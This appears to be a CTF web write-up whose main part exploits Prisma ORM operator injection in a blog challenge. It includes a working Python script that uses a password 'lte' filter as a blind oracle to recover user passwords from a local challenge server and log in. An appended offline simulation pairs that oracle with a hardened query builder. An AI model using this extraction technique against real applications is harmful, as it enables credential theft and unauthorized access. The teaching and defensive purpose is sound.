
web

Scavenger

Although this is the warm-up (sign-in) challenge, it is still quite a hassle.

1 [screenshot: image-20251031150618998]

2 [screenshot: image-20251031150834426]

5 [screenshot: image-20251031151422153]

7 [screenshot: image-20251031151520445] [screenshot: image-20251031151541274]

4 [screenshot: image-20251031151626112]

6 [screenshot: image-20251031151708987]

3 [screenshot: image-20251031151746577]

prismatic blogs

First, notice that the request for posts sets published to true.

Looking at seed.js, the flag is indeed in a post whose published is false.

Fed it to the AI, which said the posts endpoint might accept a structure like

```js
{
  where: {
    OR: [
      {
        published: "true"
      }
    ],
    published: true
  }
}
```

to bypass published=true.

But in practice it did not work.

Debug error: [screenshot: image-20251031193138956]

The error says the types do not match.

Since the injected value is always treated as a string, only string-typed fields can be used.

Those are just title, body, and the name and password of the author that authorId points to.

So the only option is something like SQL injection, working through name and password.

Asked the AI; the operators it listed as possibly usable were gt, lt and so on, which looks a bit like MongoDB.

Also:

In a Prisma where condition, all top-level fields are ANDed by default,

so OR cannot be placed at the same level as published; fields at that level are implicitly ANDed, and AND/OR only take effect one level down.

Tried using lte, i.e. <=, for blind injection:

```python
import requests

users = ["White", "Bob", "Tommy", "Sam"]
up = {}
# Ordered as in ASCII, so string comparison with lte behaves like an ordered search
charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
passwd = ""
for user in users:
    for i in range(32):
        for j in range(len(charset)):
            # author[password][lte] is injected as a Prisma string filter:
            # any post coming back means password <= passwd + charset[j]
            res = requests.get(
                f"http://localhost:32771/api/posts?author[name]={user}&author[password][lte]={passwd + charset[j]}"
            ).json()
            if len(res["posts"]) > 0:
                # the first character that makes lte true is one past the real one
                passwd += charset[j - 1]
                print(passwd)
                break

    # the final character is also recovered one step low, so shift it up by one
    up[user] = passwd[:-1] + charset[charset.index(passwd[-1]) + 1]
    passwd = ""

print(up)
# {'White': '3pCtWJfabwPlo6qNgGS1P4', 'Bob': '8AXCgMish5Zn59rSXjM', 'Tommy': 'OZuSyfPSxlwZuipoyWETQ9', 'Sam': 'AIIr7DxG3EarBQu'}

for user, password in up.items():
    res = requests.post('http://localhost:32771/api/login', json={"name": user, "password": password}).text
    if "Flag" in res:
        print(res)
        break
```
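The following is an added example and not code from the original writeup or the challenge. It simulates, over constructed in-memory data, the subset of Prisma `where` semantics the writeup leans on (top-level keys implicitly ANDed, OR only as an explicit array, relation filters, string operators such as lte, a type error when a string reaches a Boolean column), so both the operator-injection oracle and a hardened query builder can be run offline. `findPostsVulnerable`, `buildSafeWhere` and `findPostsSafe` are hypothetical handler names; the validation message only approximates Prisma's real one.

```javascript
// Constructed sample data (not the challenge's real users or posts).
const authors = [
  { id: 1, name: "Bob", password: "8constructedPw" },
  { id: 2, name: "Sam", password: "Aconstructed" },
];
const posts = [
  { id: 10, title: "Hello", body: "public", published: true, authorId: 1 },
  { id: 11, title: "Secret", body: "flag{constructed}", published: false, authorId: 1 },
  { id: 12, title: "Notes", body: "public", published: true, authorId: 2 },
];
const relations = { author: (post) => authors.find((a) => a.id === post.authorId) };

// Scalar condition: a plain value means equality, an object holds operators.
function matchScalar(value, cond) {
  if (cond === null || typeof cond !== "object") return value === cond;
  return Object.entries(cond).every(([op, arg]) => {
    switch (op) {
      case "equals": return value === arg;
      case "lt": return value < arg;
      case "lte": return value <= arg;
      case "gt": return value > arg;
      case "gte": return value >= arg;
      case "contains": return String(value).includes(arg);
      default: throw new Error(`unsupported operator: ${op}`);
    }
  });
}

// Every top-level key must hold (implicit AND), as the writeup notes;
// OR only exists as an explicit array of sub-filters.
function matchWhere(row, where) {
  return Object.entries(where).every(([key, cond]) => {
    if (key === "OR") return cond.some((sub) => matchWhere(row, sub));
    if (key === "AND") return cond.every((sub) => matchWhere(row, sub));
    if (relations[key]) {
      const related = relations[key](row);
      return related !== undefined && matchWhere(related, cond);
    }
    // Prisma rejects a string for a Boolean column; mirror that validation.
    if (typeof row[key] === "boolean" && typeof cond !== "boolean") {
      throw new TypeError(`Argument ${key}: expected Boolean, got ${typeof cond}`);
    }
    return matchScalar(row[key], cond);
  });
}

// Vulnerable handler shape: the qs-style parsed query string is spread straight
// into `where`, so a client can smuggle relation filters and operators such as
// author[password][lte]; the forced published:true does not stop that.
function findPostsVulnerable(query) {
  return posts.filter((p) => matchWhere(p, { ...query, published: true }));
}

// Hardened builder: allow-list the filters the UI needs, accept only plain
// strings for them, and reject every other key (objects, operators, relations).
function buildSafeWhere(query) {
  const where = { published: true };
  const allowed = {
    "author.name": (v) => { where.author = { name: v }; },
    "title": (v) => { where.title = { contains: v }; },
  };
  const flatten = (obj, prefix = "") =>
    Object.entries(obj).flatMap(([k, v]) =>
      v !== null && typeof v === "object" && !Array.isArray(v)
        ? flatten(v, `${prefix}${k}.`)
        : [[`${prefix}${k}`, v]]);
  for (const [path, value] of flatten(query)) {
    if (!(path in allowed) || typeof value !== "string") {
      throw new Error(`rejected filter: ${path}`);
    }
    allowed[path](value);
  }
  return where;
}

function findPostsSafe(query) {
  return posts.filter((p) => matchWhere(p, buildSafeWhere(query)));
}
```

With the vulnerable handler, `{ author: { name: "Bob", password: { lte: "9" } } }` returns Bob's published post while `lte: "7"` returns nothing, which is exactly the one-bit oracle the script above walks character by character; the top-level `OR: [{ published: "true" }]` trick instead trips the Boolean type check, matching the error in the writeup. The hardened builder never lets a nested object or operator reach the ORM, so the same request is rejected outright.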